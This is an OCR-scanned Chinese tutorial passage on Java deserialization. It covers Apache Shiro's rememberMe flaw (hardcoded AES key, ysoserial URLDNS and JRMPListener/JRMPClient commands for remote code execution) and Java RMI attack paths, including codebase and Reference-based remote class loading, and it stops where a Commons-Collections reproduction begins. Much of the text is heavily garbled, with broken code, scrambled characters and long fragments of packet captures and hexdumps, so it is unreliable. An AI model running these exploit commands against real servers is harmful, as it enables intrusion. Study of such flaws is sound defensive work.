iit AbstractRememberMeManager 类 中 的 decrypt 方法 ， 这 个 方法 是 调 
Fi CipherService.decrypt 进行 处 理 ， 看 处 理 结果 byteSource 的 开头 ， 是 不 是 很 眼熟 ，Java 序 
列 化 的 头 部 。 


= cipherService. decrypt (encrypted, getDecryptionCipherKey()); / 
Rs 


fce.getBytes[); serialized: byfej34)012728 ie TONNY BF iY AahL VO SOF zaE LHEAUN2SHDF ^ 





等 入 由 地 我 们 之 前 说 过 ， 我 们 知道 加 密 方法 是 AESICBCIPKCSSPadding , 9 


是 ; 
83 MillbDxkSb2dezirkcaaaa-- 。AES 是 对 称 加 密 ， 也 就 说 已 知 密 钥 的 情况 下 我 们 是 能 够 解密 
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this = { 
encrypted 
| serialized = {| 
cipherService 
modeName = "CBC" 


blockSize = 0 


paddingSchemeName = "PKCS5Padding" 
> Q streamingModeName = "CBC" 
@ streamingBlockSize = 8 
> @ streamingPaddingSchemeName = "PKCS5Padding" 
@ transformationString = null 
@ streamingTransformationString = null 
ə algorithmName = "AES" ma 


又 回 到 了 convertBytesToPrincipals 方法 ， 这 里 调用 了 deserialize 方法 处 理 我 们 前 面 的 序列 化 


Cookie 字 节 编码 。 


ad PrincipalCollection convertBytesToPrincipals (byte S, SubjectContext subjectContext 
t (getCipherService(}) != null) { 
bytes = decrypt(bytes); 





一 直 跟 进来 ， 就 找到 了 最 后 的 反 序列 化 输入 位 


置 org,.apache.shiro.io,Defaultserializer#deserialize o 


T deserialize(byte[] serialized) SerializationException { 
(serialized = Ut 
String msg = "argument cannot be null."; 
th ew IllegalArgumentException(msg); 
} 
ByteArrayInputStream bais w ByteArrayInputStream(serialized); 
BufferedInputStream bis = BufferedInputStream(bais); bis: Bu 


ClassResolvingObjectInputStream(bis); 


turn deserialized; 
catch (Exception e) { 
String msg = "Unable to deserialze argument byte array."; 
throw new SerializationException(msg, e); 


最 后 再 来 一 张 图 
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jdk 原 } 





beseriatize 


3. 漏 洞 利用 


Ali shiro 自 带 的 commons-collections 的 版 本 是 3.2.1， 而 在 yso 中 与 commons- 
collections 相关 的 版 本 是 3.1 。 
ZU n 


olde 从 @orange 和 @zsx 文 章 中 


2: PEE 


esodvingt Shiro re: 


ClassLoad: 


也 就 说 shiro 重 构 了 自己 的 resovleClass。 


Class<?> resolveClass(ObjectStreamClass osc) throws IOException, ClassNotFoundException { 





ClassUtils. forName(osc.getName()); 
(UnknownClassException e) { P Ld 
! ClassNotFoundException("Unable to load ObjectStreamClass [" + osc + "]: ", 


jak 原版 的 resovleClass 是 Class.forName . 


Class<?> [resolveClass(0bjectStreamClass desc) 
IOException, ClassNotFoundException 


String name = T dead gen DE 
{ 


— — 
—ÓmQ B 
aen — — 
—— €—— 


" 
I 


e V CidSSNOFOUTIGEXCEDT TOT EXT 
Class<?> cl = -get (name) ; 
(cl f= null) { 
return cl; 
} else 1 
throw ex; 









跟 进 resovleClass， 实 际 上 是 loadClass , 所 以 锅 出 在 了 这 里 。 


Class forName(String fqcn) UnknownClassException { 
Class clazz = 


{clazz = 


the current ClassLoader..."); 


(clazz == 
{ 


om the current ClassLoader. “ + 
clazz = 


(clazz == ) 1 
String msg = "Unable to load class ast fqc rom the thread context, current, or " 4 
"system/applicat S. ll heuri have been exhausted. Class could not be found. 
UnknownC lass&x 


clazz; 
} 


当然 我 个 人 习惯 ， 遇 到 这 类 反 序列 化 喜欢 先 用 URLDNS HTM, GEE, BA RIRMPH 
弹 。 首 先 为 什么 使 用 URLDNS 呢 ， 因 为 这 类 型 反 序列 化 要 getshell 太 麻烦 ，getshell 会 遇 到 3 
getRuntime().exec() 命令 拼接 的 锅 导致 一 些 特殊 符号 没 办 法 正确 表达 自己 意思 。 另 一 方面 如 果 要 
反弹 shell 的 话 ， 这 个 URLDNS 就 可 以 用 来 探测 ， 直 接 就 可 以 判断 服务 器 是 否 可 允许 出 网 ， 避 免 丝 
琐 的 Java 环 境 安 装 之 后 发 现 服务 器 无 法 出 网 。 






java -jar ysoserial-master-SNAPSHOT.jar URLDNS http://xxx.dnslog.cn 


进一步 执行 命令 的 话 还 是 喜欢 用 JRMP 这 个 Gadget ， 这 个 的 底层 走 的 RMI ， 我 们 可 以 在 JRMP 
Server 上 自 定义 命令 。 


java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 4444 Comme h: 


# JRMP Server 监 听 


java -jar ysoserial-master-SNAPSHOT.jar JRMPClient '1.2.3.4:1444' 


# 使 用 JRMPClient 连接 监听 中 的 JRMP Server. 


f 


4. 修 复方 式 


针对 这 个 问题 shiro 解 决 了 自 带 的 硬 编码 的 问题 ， 当 然 如 果 用 户 还 是 用 硬 编码 的 方式 ， 一 旦 key 泄 
漏 ， 一 样 是 会 造成 反 序列 化 的 问题 。 
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jx 
Morus, &nÜVER E. 






ememberMeManager() { 
DefaultSerializer«PrincipalCollection»(); 
= new AesCipherService(); 
ipherService; 
.generateNewKey( ) .getEncoded()) ; 


ll 会 遇 到 
一 方面 如 果 要 


Reference 






Pwn a CTF Platfo: 
强 网 杯 "彩蛋 ”” 


以 在 JRMP Apache Shiro Ja 


4444 Comme 


ey 泄 








RMI- 反 序列 化 


前 言 


在 复 现 fastjson 的 过 程 中 看 到 rmi、LDAP 等 机 制 的 使 用 ， 一 直 模 模糊 糊 搞 不 懂 ， 想 来 搞 清楚 这 
西 。 







但 是 发 现 RMI 在 fastjson 中 的 利用 ， 只 是 JNDI 注 入 的 其 中 一 种 利用 手段 ， 与 RMI 本 身 的 反 序列 
是 很 有 关系 。 


原本 想 在 一 篇 中 整理 清楚 ， 由 于 JNDI 注 入 知识 点 太 过 杂 迷 ， 将 新 起 一 篇 说 明 。 
此 篇 ， 我 们 以 RMI 服 务 入 手 ， 从 基础 使 用 开始 再 到 反 序列 化 利用 。 


RMI 


RMI (Remote Method Invocation) ， 远 程 方法 调用 。 跟 RPC 差 不 多 ， 是 java 独 立 实现 的 一 种 
制 。 实 际 上 就 是 在 一 个 java 虚 拟 机 上 调用 另 一 个 java 虚 拟 机 的 对 象 上 的 方法 。 


RMI 依 赖 的 通信 协议 为 JRMP(Java Remote Message Protocol , Java 远程 消息 交换 协议 )， 该 
为 Java 定 制 ， 要 求 服务 端 与 客户 端 都 为 Java 编 写 。 这 个 协议 就 像 HTTP 协 议 一 样 ， 规 定 了 客户 
服务 端 通信 要 满足 的 规范 。 (我 们 可 以 再 之 后 数据 包 中 看 到 该 协议 特征 ) 


在 RMI 中 对 象 是 通过 序列 化 方式 进行 编码 传输 的 。 (我 们 将 在 之 后 证 实 ) 
RMI 分 为 三 个 主体 部 分 : 
client 客户 端 : 客户 端 调用 服务 端的 方法 


Server- 服 务 端 ; 远程 调用 方法 对 象 的 提供 者 ， 也 是 代码 真正 执行 的 地 方 ， 执 行 结束 会 返回 
户 端 一 个 方法 执行 的 结果 。 


Registry- 注 册 中 心 ; 其 实 本质 就 是 一 个 map， 相 当 于 是 字典 一 样 ， 用 于 客户 端 查询 要 调用 | 
法 的 引用 。 


总 体 RMI 的 调用 实现 目的 就 是 调用 远程 机 器 的 类 跟 调 用 一 个 写 在 自己 的 本 地 的 类 一 样 。 
唯一 区 别 就 是 RMI 服 务 端 提 供 的 方法 ， 被 调用 的 时 候 该 方法 是 执行 在 服务 端 。 






ld extends Remote { 


| String hello(String a) throws RemoteException; 
明知 则 客户 端 在 尝试 加 载 实现 远程 接口 的 远程 对 象 时 会 出 错 。 (如 果 客 户 端 


5 要 生命 java.rmi.RemoteException 报 错 
这 个 远程 接口 
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public class d extends Un: implements IR 
protected throws RemoteExceptio: { 
uper(); 
System.out.println( 5mm"); 
È 
put E , 
System.out.println( from"); 
returr ; 
5 
} 
这 个 实现 类 需要 


。 实现 远程 接口 


。 继承 UnicastRemoteObiject 类 ， 瑶 似 继承 了 之 后 会 使 用 默认 socket 进 行 通讯 ， 并 且 该 实现 类 
一 直 运 行 在 服务 器 上 。 


(如 果 不 继承 UnicastRemoteObject 类 ， 则 需要 手工 初始 化 远程 对 象 ， 在 远程 对 象 的 构造 方 
的 调用 UnicastRemoteObject.exportObject() 静 态 方法 。) 


。 构造 函数 需要 抛 出 一 个 RemoteException 错 误 
实现 类 中 使 用 的 对 象 必须 都 可 序列 化 ， 即 都 继承 java.io.Serializable 
1. 注册 远程 对 象 
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ments lé erver { 


ace IRemoteHe.l. 


d extends i 


ing; rebind("//127.0.0.1/Hello", h); 
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i extends Remote 


Static void main(String[] args) throws Exception { 


implements 


。 关于 绑 定 的 地 址 很 多 博客 会 /mip:poryObjectpame 的 形式 
实际 上 看 rebind 源 码 就 知道 RM/: 写 不 写 都 行 ; 
port 如 果 默 认 是 1099， 不 写 会 自动 补 上 ， 其 他 端口 必须 写 





那么 服务 端 就 部 署 好 了 ， 来 看 客户 端 
1. 客户 端 部 署 


package rmi; 


import java.rmi.Naming; 


import java.rmi.NotBoundException; 


public class { 


public static void throws Exception ( 





RMIServer.IRemoteHelloworld hello = (RMIServer.IRemoteHelloWorld) Nami 


String ret = hello.hello("in| jogo"); 


System.out.println( ret); 
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31 









Jt abe ERES 引用 服务 端的 类 ， 客 户 i 端 不 知道 这 个 类 的 源 代码 也 是 可 以 的 ， 
X 须 一 致 ，serialVersionUID 一 致 ) 


查找 远程 对 象 ，rmi: 也 可 省 略 
于 运行 客户 端 ， 就 可 以 完成 调用 


化 


具体 通讯 细节 ， 来 加 深 了 解 RMI 的 过 程 : 
抓 包 查 看 数据 。 


数据 进入 ， 不 好 看 ， 总 体 流程 引用 java 安 全 漫谈 -RMI 篇 的 数据 流程 图 ， 再 自 










66 2430 + 1099 [SYN] Seq«0 Win-«64240 Len=8 MSS«1460 WS«256 SACK_PERM=1 

s; $6 1099 + 2438 (SYN, ACK Ackel Bed mc 1460 SACK PERM-1 WS-128 
192.168.135.142 D 54 2436 = 1899 [ACK] Se L 
192.168.135.142 ‘I 61 IRMI, Version: 2, ol 
192.168.135.1 e 54 1099 + 2436 [ACK] Segel Ack"8 Win-29312 Len=@ 
192.168.135.1 RAT 74 JEMI, ProtocolAck 
192.168.135.142 RMI 74 Continuation 1 
192.168.135.142 RMI 103 JRMI, Call 
192.168.125.1 54 1099 + 2438 [ACK] Seq=21 Acke77 Wine29312 Lene@ 
192.168.135.1 M 395 JRMI, ReturnData 
192.168.135.142 54 2430 ^ 1099 LACK 369-77 Ack 262. win 121050624 lent 















reamProt 


















192.168.135.1 =] Ackag Win=29312 Lens@ 




























192.168.135.1 XP EGET nerd Ack=® W1n-29312 Len=20 2 
192.168.135.142 TCP 031136 Len*20 
192.168.135.142 Te 1851136 Len»451 
192.168.135.1 TP 

192.168.135.1 Te 

192.168.135.142 RMT 

192.168.135.1 RME 

192.168.135.142 PME 

192.168.135.142 TP 

192.168.135.1 KP 90 33769 + 24. 


192.168.135.1 $4 1899 « 2430 {ack} De ARAJ Win in«29312 1 Len=@ 
192.168.135.142 8 54 2431 > 13769 [ACK] Seqs520 Ack-344 Wine1050624 Len 
19 ， p T Seq»93 Ack«363 W J 8 












注册 中 心 (1099 端 口 ) 建立 通讯 ; 
查询 需要 调用 的 函数 的 远程 引用 ， 注 册 中 心 返回 远程 引用 和 提供 该 服务 的 服务 端 IP 与 端 


ld) Naminé 
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448907 127.0.0.1 127.0.0.1 TCP 84 24428 > 1099 [ACK] Seq-1 Ack-1 Win-2619648 Len=0 
450404 127.0.0.1 127.0.0.1 = RMI 98 JRMI, Version: 2, StreamProtocol P 
450446 127.0.0.1 127.0.0.1 TCP 84 1099 > 24428 [ACK] Seq-1 Ack-8 Win=2619648 Len=8 
450596 127.0.0.1 127.0.0.1 RMI 116 JRMI, ProtocolAck 
450638 127.0.0.1 127.0.0.1 TCP 84 24428 » 1099 [ACK] Seq-8 Ack-17 Win-2619648 Len=0 
450839 127.0.0.1 127.0.0.1 RMI 122 Continuation 
450872 127.0.0.1 127.0.0.1 TCP 84 1099 » 24428 [ACK] Seq-17 Ack=27 Win=2619648 Len=@ 
| 461938 127.0.0.1 127.0.0.1 RMI 182 JRMI, Call 
| 461999 127.0.0.1 127.0.0.1 TCP 84 1099 > 24428 [ACK] Seq-17 Ack-76 Win-2619648 Len=0 
| 462515 127.0.0.1 127.0.0.1 RMI 740 JRMI, ReturnData 
ARIDAM 462553 127.0.0.1 127.0.0.1 TCP 84 24428 + 1099 [ACK] Seq-76 Ack-345 Win=2619392 Len-e 
| 636531 172.17.88.209 172.17.88.209 TCP 108 24429 > 24395 [SYN] Seq=@ Win=65535 Len-0 MSS=65495 WS-256 
« 


Frame 45: 182 bytes on wire (1456 bits), 93 bytes captured (744 bits) on interface @ 
Null/Loopback 

Internet Protocol Version 4, Src: 127.0.0.1, Dst: 127.0.0.1 

Transmission Control Protocol, Src Port: 24428, Dst Port: 1099, Seq: 27, Ack: 17, Len: 49 
Java RMI 

Java Serialization 


rus 注册 中 心 


9020 
2636 
8049 





0050 


42 2.450638 127.0.0.1 84 24428 + 1099 [ACK] Seq-8 Ack-17 Win-2619648 Len=0 





Il 1 
| | 43 2.450839 127.0.0.1 127.0.0.1 RNI 122 Continuation 
| 44 2.450872 127.0.0.1 127.0.0.1 TCP 84 1099 + 24428 [ACK] Seq=17 Ack=27 Win=2619648 Len=0 
WI 45 2.461938 127.0.0.1 127.0.0.1 RMI 182 JRMI, Call 
46 2.461999 127.0.0.1 127.0.0.1 TCP 84 1099 + 24428 [ACK] Seq-17 Ack=76 Win=2619648 Len=@ 
| 47 2.462515 127.0.0.1 127.0.0.1 CRAT 746 JRMT, ReturnData 7] 
48 2.462553 127.0.0.1 TCP 84 24428 + 1099 [ACK] Seq=76 Ack- 345 Win=2619392 Len=@ 
49 2.63653: : Uu s 
51 2.636642 172.17.88.209 172,17.88.209 TCP 84 24429 i 24395 ACK] Seq= 1 Ack=1 Win=2619648 Len=@ 


SRARMORE TCE, ^ MERE BRE E 
Frame 47: 740 bytes on wire (5920 bits), 372 bytes captured (2976 bits) on interface @ ZESPS nns HRS, RCE 


Null/Loopback 
Internet Protocol Version 4, Src: 127.0.0.1, Ost: 127.0.0.1 

| Transmission Control Protocol, Src Port: 1099, Dst Port: 24428, Seq: 17, Ack: 76, Len: 328 
Java RMI 

| Java Serialization 








| 02 08 08 3G 45 O00 O1 7G 39 cb 48 30 BE 06 3 90 t p9&8 
| 7f ee eo o1 7f 00 Ge O1 O4 4b Sf 6c ff 4d be = eS anes Bd edi 
| 2f 19 fa 26 50 18 27 f9 21 fe oo oo sac ed oo] / aP" 
105177 ef @1 bf e4 1c 1a 600 00 01 6d 9a b5 el d w m 
| 86 08 73 7d 00 ee ee e2 ƏƏ ef 6a 61 76 61 2e 72 s) java.r 
| 6d 69 2e 52 65 6d 6f 74 65 00 1f 72 6d 69 2e 52 mi.Remot e. rmi.R 
| 4d 49 53 65 72 76 65 72 24 49 52 65 6d 6f 74 65  MIServer $IRemote 
48 65 6c 6c 6f 57 6f 72 6c 64 70 78 72 00 17 6a Helliowor ldpxr j 
| 61 76 61 2e 6c 61 6e 67 2e 72 65 66 6c 65 63 74  ava.lang .reflect 
2e 50 72 6f 78 79 el 27 da 20 cc 10 43 cb 02 00 .Proxy * c 
01 4c 00 01 68 74 00 25 4c 6a 61 76 61 2f 6c 61 i ht * Ljava/la 
6e 67 2f 72 65 66 5c 65 63 74 2f 49 6e 76 6f 63  ng/refle ct/Invoc 
61 74 69 6f 6e 48 61 6e 64 6c 65 72 3b 78 78 70 ationHan dler;pxp 
| | 73 72 00 2d 6a 61 76 61 2e 72 6d 69 2e 73 65 72 Sr -java .rmi.ser 
| 76 65 72 2e 52 65 6d 6f 74 65 4f 62 6a 65 63 74 ver.Remo teObject 
49 6e 76 6f 63 61 74 69 6f 6e 48 61 6e 64 6c 65 — Invocati onHandle 
72 00 00 00 G2 O00 00 O0 02 02 00 O00 70 78 7200 r pxr 
| 1c 6a 61 76 61 2e 72 6d 69 2e 73 65 72 76 65 72 java.rm i.server 
2e 52 65 6d 6f 74 65 4f 62 6a 65 63 74 d3 61 b4  .RemoteO bject a 
91 ec 61 33 le 03 Ge O0 70 78 70 77 36 00 ða 55 a3 pxpw6 U 
| 6e 69 63 61 73 74 52 65 66 00 Od 31 37 32 2e 31  nicastRe f "UM ad RRM 
37 2e 38 38 2e 32 30 39 |00 00 5f 4bj1c 19 6d cc 了 .88.269 "ur m 
70 cd e7 d4 bf e4 1c 1a 90 68 01 6 bS el df p m 
80 01 01 78 十 进 制 为 24395* 
( 2 m iB 











I 1. 客户 端 新 起 一 个 端口 与 服务 端 建立 TCP 通 讯 


客户 端 发 送 远 程 引 用 给 服务 端 ， 服 务 端 返回 水 数 唯一 标识 
的 含义 打上 问号 ， 猜 测 大 概 是 这 个 意思 ) 


符 ， 来 确认 可 以 被 调用 (此 处 返回 结 








160 


















172.17.88.209 
172.17.88.209 
172.17.88.209 
172.17.88.209 
172.17.88.209 
172.17.88.209 
172.17.88.209 
172.17.88.209 


9 172.17.88.209 

172.17.88.209 
:0 172.17.88.209 
I5 WS=256 SACK 


TCP 


TCP 


TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 


AAA?rAARAAAARAAAARAAAAA 






9e 6 
o ol 

61 

62 


172.17.88.209 
172.17.88.209 
172.17.88.209 
172.17.88.209 





172.17.88.209 









172.17.88.209 











ac 
b5 








ed 
el 
2e 


158 di 5f 4b 5f 6d c7 d6 20 
8 27 f7 14 ab 60 00 51 
| 1c 1a 6d 9a 
6a 6i 2e 72 6d 
1 73 65 e2 66 Qc 
5 76 61 65 4c 00 
6a 61 2f 72 6d 
44 3b 70 00 o0 
11 6a 61 2e 72 
49 44 5b af a4 
4 61 64 74 00 02 
60 15 61 76 61 
65 72 49 44 3b 
? ac f3 06 08 54 
90 08 43 e9 7b 
1 76 61 6d 69 2e 
44 of 0d bf 36 
6f 75 4a 00 04 
: 69 71 70 78 70 
2 9b 19 4a 


+i java 
VRID; pX 





Thfeair13n0na016rlqahse1rfRnnq7377 
6d b2 40 00 80 06 00 





80 E 
a x 

6 P 
df w 
64 sr 
34  gc.te 
6d J 
64 idt 
00  gc/VM 
2e ‘sr 
b6 dgc.Vv 
4c [ 
6d uid 
70  i/ser 
80 ur [ 
3a pxp 
72 srj 
02  ver.U 
6d E 
90 el u 

m 


的 代码 是 这 一 句 (未 确定 ) 


84 24429 
98 24429 
84 24395 
124 24395 
84 24429 
122 24429 
84 24395 
986 24429 
84 24395 
658 24395 
84 24429 


14, Src: 172.17.88.209, Dst: 172.17.88.209 
tocol, Snc Port: 24429, Dst Port: 24395, Seq: 27, Ack: 21, Len: 451 





> 24395 [ACK] Seq-1 Ack=1 Win=2619648 Len=0 

> 24395 [PSH, ACK] Seg-1 Ack=1 Win-2629648 Len=7 

> 24429 [ACK] Seq-1 Ack=8 Win=2619648 Len=@ 

> 24429 [PSH, ACK] Seq=1 Ack-8 Win=2619648 Len-20 

> 24395 [ACK] Seq=8 Ack=21 Win=2619648 Len=0 

> 24395 [PSH, ACK] Seq=8 Ack=21 Win=2619648 Len=19 
224429 [ACK] Seq=21 Ack=27 Win=2619648 Len=0 
2.24395 [PSH, ACK] Seq=27 Ack=21 Win=2619648 Len=451 
> 24429 [ACK] Seq=21 Ack-478 Win-2619136 Len=0 

> 24429 [PSH, ACK] Seq=21 Ack=478 Win=2619136 Len=287 
> 24395 [ACK] Sea=478 Ack-308 Win=2619392 Len=0 


(7888 bits), 495 bytes captured (3960 bits) on interface 6 


TR: 342 


122 24429 + 24395 [PSH, ACK] Seq=8 Ack=21 Win=2619648 Len=19 
84 24395 + 24429 [ACK] Seq=21 Ack=27 Win=2619648 Len=6 


986 24429 
84 24395 
658 24395 » 24429 [PSH, ACK] Se 
84 24429 + 24395 [ACK] Sea=478 Ack-308 Win=2619392 Len=0 





4, Src: 172.17.88.209, Dst: 172.17.88.209 
ocol, Src Port: 24395, Dst Port: 24429, Seq: 21, Ack: 478, Len: 287 


Ene 
x 


H TQ 


+ 


24395 [PSH, ACK] Seq=27 Ack=21 Win=2619648 Len=451 
1 Ack-478 Win=2619136 Len=0 
1 Ack=478 Win=2619136 Len=287 












? (5264 bits), 331 bytes captured (2648 bits) on interface @ 


ja va.rmi.d 
ase 于 ]J 4 


va lueL 


vm 


Lja va/rmi/d 


ID; pxp 


j ava.rmi. 


MID .[ 
ad drt 


m 


[BL 


t- Ljava/rm 
ver /UID;pxp 


B Tm 
hnc ( 


ava .rmi.ser 
ID p. 60 


cou ntJ 


niq uepxp 


br 353 
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tim 


RMIServer.IRemoteHelloWorld hello = (RMIServer.IRemoteHelloWorld) Naming. log 





这 里 会 返回 一 个 PROXY 类 型 函数 (由 于 是 之 后 补 的 





1. 客户 端 与 注册 中 心 (1099 端 口 ) 通讯 ， 不 知道 在 做 喻 


1. 客户 端 序列 化 传输 调用 函数 的 输入 参数 至 服务 端 
服务 端 返回 序列 化 的 执行 结果 至 客户 端 


82 
83 
84 
85 
86 
87 
88 
89 
9e 
91 


Frame 90; 200 bytes on wire (1600 bits), 102 bytes captured (816 bits) on interface 0 


NNNNN 


NNNNN 


- 658436 
,658467 
.658584 
.658614 
.659614 
,659644 
,659721 
.659752 
.659881 
- 659910 


Null/Loopback 
Internet Protocol Version 4, Src: 172.17.88.209, Dst: 172.17.88.209 


Transmission Control Protocol, |Src Port: 24429, Dst Port: 24395,|Seq: 479, Ack: 309, Len: 58 


v Data (58 bytes) 


Data 


@2 
ac 

c7 
e5 
eo 
be 
67 


eo 
11 
d6 
77 
061 
82 
6f 


ee eo 
58 di 
21 c6 
22 1c 
6d 9a 
5e 6f 


67 6f 


45 
ac 
50 
19 
bs 
31 


67 


ee 
11 


18 2 


6d 
el 
74 
6f 


127 


127. 
127. 
172. 
172. 
172. 
A 
172. 


172 


eo 


.0.0.1 
127. 


9.0.1 
6.6.1 
90.0.1 


17. 
17. 
17. 
17. 
17. 
X17, 


62 
di 
f8 
70 
Be 
be 


88. 
88. 
88. 
88. 
88. 
88. 


6d 
Sf 
cb 
cd 
01 
69 


209 
209 
209 
209 
209 
209 


40 
bf 
ee 
d4 
ff 


> 70 


eo 
4b 
eo 
bf 
ff 
75 


80 
d7 
50 
e4 
ff 
74 


127. 
127. 
127. 
127. 
172. 
172. 
172. 
172. 
172. 
172. 


96 
36 
ac 
1c 
ad 
21 


0.0.1 
8.8.1 
0.0.1 
0.0.1 


17 


17. 
17. 


17 


17. 
17. 


ee 
fa 
ed 
la 
0e 
67 


.88 
88. 
88. 
88. 
88. 
88. 


eo 
fe 
eo 


.209 


209 
209 
209 
209 
209 


ff 


go 


RMI 86 
TCP 84 
RMI 114 
TCP 84 
TCP 86 


TCP 84 
TCP 86 
TCP 84 


TCP 200 
TCP 84 


sparpHhppps77721r19Fd4rr7prdp7HAhfpa1r1aPPPPP1FHoa 


m ( 
^olt input!go ., 


ogogo 
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， 代 码 不 一 样 ) 







JRMI, PingAck 

24428 + 1099 [ACK] Seq=77 Ack=346 Win=2619392 Len=0 
JRMI, DgcAck 
1099 + 24428 [ACK] Seq=346 Ack-92 Win=2619648 Len 
24429 + 24395 [PSH, ACK] Seq=478 Ack=308 Win=26 
24395 + 24429 [ACK] Seq=308 Ack=479 Win=26191 
24395 ^ 24429 [PSH, ACK] Seq-308 Ack=479 Win 
24429 > 24395 [ACK] Seq=479 Ack-309 Win=2619392 Len=0 
24429 + 24395 [PSH, ACK] Seq-479 Ack=309 Win-2619392 Lenga 
24395 + 24429 [ACK] Sea=309 Ack=537 Win=2619136 Len=@ 








1/4.1/.85. 209 











172.17.88.209 cP 
) Na 1 172.17.88.209 TCP eq 
ming 172.17.88.209 TCP ACK] S 479 Wi Pais 

172.17.88.209 TCP CK] Seq=479 Ack-309 Win-2619392 Len=0 

172.17.88.209 TCP SH, ACK] Seq-479 Ack=399 Win=2619392 Len=58 

172.17.88.209 TCP CK] Seq=309 Ack-537 Win-2619136 Len "M 

172.17.88.209 TCP » ACK] Seq-309 Ack-537 Win-2619136 Len-36 
Sea=537 Ack-345 Win=2619392 Len= 







es on wire (1248 bits), 80 bytes captured (649 bits) on interface © 

7.88.209, Dst:. 172.17.88.209 

: 24395, Dst Port: 24429,| Seq: 309, Ack: 537 as 3 
? + 537, Len: 36 









Übrea1ciaaaeonterdaahse11fR202740^ 


ac 6d ba 40 00 80 06 00 00 E L 





ee 

sg di Sf 4b 5f 6d c7 d6 21 c6, Xx. xw] 
27 #7 89 9100 00 51 ac ed 00 6 'P' iQ 
lc 1a oo 00 01 6d 9a b5 el df wW m 
65 6c 6f 20 77 6f 72 6c 64 tl Hel lo world 


A. | BIDS HPA BORSE RD EERE 1 0518 9886 我 们 尝试 从 代码 中 找到 对 应 的 反 序 列 化 语句 
m. 图 上 克朗 让 这 发 送 调 用 函数 输入 参数 的 序列 化 过 程 ， 接 受 服务 端 返回 内 容 的 反 序列 化 语句 位 置 分 别 如 
A 


8179979575797 
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RMI 服 务 端 与 客户 端 readObject 其 实 位 置 是 同一 个 地 方 ， 只 是 调用 栈 不 同 ， 位 置 如 下 : 


” 5 i s 


RMI 利 用 点 


那么 我 们 可 以 确定 RMI 是 一 个 基于 序列 化 的 java 远 程 方法 调用 机 制 。 我 们 来 思考 这 个 过 程 存 在 的 漏 
洞 点 : 


L 控制 ?或 探测 可 利用 RMI 服 务 


可 以 看 到 我 们 可 以 使 用 rebind、 bind、unbind 等 方法 ， 去 在 注册 中 心中 注册 调用 方法 。 那 我 们 是 不 年 
是 可 以 恶意 去 注册 中 心 注册 恶意 的 远程 服务 呢 ? 


实际 上 是 不 行 的 。 
RMI 注 册 中 心 只 有 对 于 来 源 地 址 是 localhost 的 时 候 ， 才 能 调用 rebind、 bind、unbind 等 方法 。 
不 过 list 和 lookup 方 法 可 以 远程 调用 。 
list 方 法 可 以 列 出 目标 上 所 有 绑 定 的 对 象 : 
String[] s = Naming.list("rmi://192.168.135.142:1099"); 
lookup 作 用 就 是 获得 某 个 远程 对 象 。 
如 果 对 方 RMI 注 册 中 心 存在 敏感 远程 服务 ， 就 可 以 进行 探测 调用 ( 
1. 直接 攻击 RMI 服 务 器 


他 的 RMI 服 务 端 存在 readObject 反 序列 化 点 。 从 通讯 过 程 可 知 ， 服 务 端 会 对 客户 端的 任意 输入 进行 
肥 序 列 化 。 





如 果 服 务 端 存在 漏洞 组 件 版 本 (存在 反 序列 化 利用 链 ) ， 就 可 以 对 RMI 服 务 接口 进行 反 序列 化 攻 
击 。 我 们 将 在 接 下 来 复 现 这 个 RMI 服 务 的 反 序 列 化 漏洞 。 它 将 导致 RMI 服 务 端 任意 命令 执行 。 





( 讲 道理 由 于 客户 端 同样 存在 ReadObject 反 序列 化 点 ， 恶 意 服务 端 也 可 以 打 客 户 端 ， 就 不 复 现 了 ) 


1. 动态 加 载 恶 意 类 (RMI Remote Object Payload) 在 5 









如 下 : 


a — * 3 * 
动态 类 加 载 。 
最 务 端 之 间 传 递 的 是 一 些 序列 化 后 的 对 象 。 如 果 某 一 端 反 序列 化 时 发 现 一 
自己 的 CLASSPATH 下 寻找 想 对 应 的 类 。 














党 个 类 的 定义 ( 即 CLASSPATH 下 没有 ) ， 它 可 以 根据 codebase 去 下 载 这 个 类 
0 载 这 个 对 象 class 文 件 。 


bh, 告诉 Java 虚 拟 机 我 们 应 该 从 哪个 地 方 去 搜索 类 ; CLASSPATH 是 本 地 路 径 ， 
渤 程 URL， 比 如 http、ftp 等 。 所 以 动态 加 载 的 class 文 件 可 以 保存 在 web 服 务 器 、 


jeBase=http://exam ， 动 态 加 载 org.vulhub.example.Example 类 ， 


x 
下 载 这 个 文件 1 


“Codebase， 就 可 以 加 载 执行 恶意 类 。 同 时 也 存在 一 定 的 限制 条 件 : 
8 T SecurityManager 
氏 于 7u21、6u45， 或 者 设置 了 java.rmi.server.useCodebaseOnly-false 


sruseCodebaseOnly 配置 为 rue 的 情况 下 ，Java 虚 拟 机 将 只 信任 预先 配置 好 的 
IET. 不 再 支持 从 RMI 请 求 中 获取 。 


Va 安全 漫谈 -05 RMI 篇 (2) 一 文中 有 描述 。 
讲述 有 这 个 漏洞 原理 ， 由 于 未 找到 真实 利用 场景 ， 不 细 说 。 











方法 。 更 是 RMI 远 程 对 象 加 载 ， 即 RMI CI 
T = (Icalc) Naming. lookup("rmi://192.168.135.142:1099/ref0bj"); 
Integer> li = new Payload(); 

输入 进行 OAM 

| 化 攻 E 

Ta BEA 

复 现 了 ) 委 端 在 绑 定 远程 对 象 至 注册 中 心 时 ， 不 只 是 可 以 绑 定 RMI 服 务 器 本 身上 的 对 象 ， 还 可 以 使 用 


Jence 对 象 指定 一 个 托管 在 第 三 方 服务 器 上 的 class 文 件 ， 再 绑 定 给 注册 中 心 。 
局 端 处 理 服务 端 返 回 数据 时 ， 发 现 是 一 个 Reference 对 象 ， 就 会 动态 加 载 这 个 对 象 中 的 类 。 
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攻击 者 只 要 能 够 
1. 控制 RMI 客 户 端 去 调用 指定 RMI 服 务 器 
2. 在 可 控 RMI 服 务 器 上 绑 定 Reference 对 象 ，Reference 对 象 指定 远程 恶意 类 
3. 远程 恶意 类 文件 的 构造 方法 、 静 态 代码 块 、getObjectinstance() 方 法 等 处 写 入 恶意 代码 | 





就 可 以 达到 RCE 的 效果 。fasjson 组 件 漏 酒 rmi、ldap 的 利用 形式 正 是 使 用 Indi 注 入 ， 而 不 是 有 关 
反 序 列 化 。 


有 关 JNDI 注 入 ， 以 及 其 fastjson 反 序列 化 的 例子 相关 知识 太 多 。 这 篇 只 是 引出 ， 暂 不 表述 。 


复 现 直接 攻击 RMI 服 务 器 Commons-collections3.1 


举例 Commons-collection 利 用 rmi 调 用 的 例子 。 
RMI 服 务 端 (受害 者 )， 开 启 了 一 个 RMI 服 务 
